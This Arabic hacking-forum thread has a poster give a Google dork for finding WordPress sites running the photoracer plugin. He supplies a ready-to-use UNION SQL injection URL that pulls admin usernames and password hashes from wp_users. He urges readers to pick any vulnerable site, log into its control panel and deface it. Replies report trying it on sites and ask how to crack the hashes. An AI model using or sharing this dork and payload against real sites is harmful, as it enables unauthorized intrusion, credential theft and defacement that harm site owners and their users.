السلام عليكم ورحمه الله وبركاته . كيفكم . أخواني إن شاء الله الكل بخير .. اليوم معي ، ثغرة حلوة في سكربتات وردربرس. إن شاء الله الكل يستفيد ،، من المواقع...

Dr.NaNo

New Member
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
السلام عليكم ورحمه الله وبركاته .

كيفكم . أخواني إن شاء الله الكل بخير ..


اليوم معي ، ثغرة حلوة في سكربتات وردربرس. إن شاء الله الكل يستفيد ،، من المواقع المصابــة .

ونبغى نشوف ،، قسم االإنجازات مليان مواقع مخترقه من قبلكم ياعناكبي . لوول ..


نبدأ بسم الله .:


أولا.:

الدوركـ .:

inurl:"wp-content/plugins/photoracer/viewimg.php?id="
بتفتح قوقل كالعادة وبتحط الدورك وبتطلع لك مواقع واختار

اي واحد الي يعجبــك ..


ثانيــأ.:

الإٍستغلال .:

بتسوي كذا على طول ...:


PHP:
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
يعني مثال .:

www.xxx.com/

انت خذ الاستغلال الي فوق وحطـه بعد رابط الموقع وشوف وش يطلع لك..

بطلع لك الباسورد واليوزر تبع الادمن .. .:


مثال كامل . على الاستغلال .:


www.xxx.com/
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
فهمـتووو كيف ياحلوين ..





ثالثـأ.:

لوحـة التحكم .:

بس بتسوي بعد رابط الموقع هيك .:


وبتطلع لك لوحـة التحكم ..... لوول ..






يالله ، بدي اشوف اندكسات لوول..



أخوكم .:

PHP:
 Dr.NaNo


بالتوفيــــــــــــــق لــكــم ..

 
التعديل الأخير:

Dr.NaNo

New Member
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
مثل ماقال فلكانو ،، بتمرون على الموضوع وماحد يرد ..

على العموم مشكوووووورين جميـــعا كل الي مرر بالصفحــة بشكرهم كثيررررررررر لو بدكم بوسسه على الراس مش مشكله .


سلاآآم
 

Marine

Love Me
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
تشكراتي

بس الورد بريس هاشات صعبه
 

hussin123

New Member
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
جربت كثر من موقع ولكن للاسف ولا موقع صار
 

ubuntu

New Member
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
Dr.NaNo
لو*سمحت*ابي*اعرف*طريقة decrypte الورد*برس*باس*ورد
Thx to All
 

Zero

New Member
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
[align=center]جميل اخي شكرااا[/align]
 

mobdeen

New Member
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
والله ثغرة شغالة وتمام بس المشكلة الهاش كيف نفكه

وهي شغالة والمصابة اكثر
 

ubuntu

New Member
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
yes the wordpress hash is complicated :S
 

Sp1d3r

New Member
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
مشكور على الموضوع القيم

سلمت بداك
 

mr.ft

New Member
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
مشكووووووووووور يعطيك الف عافيه
 
أعلى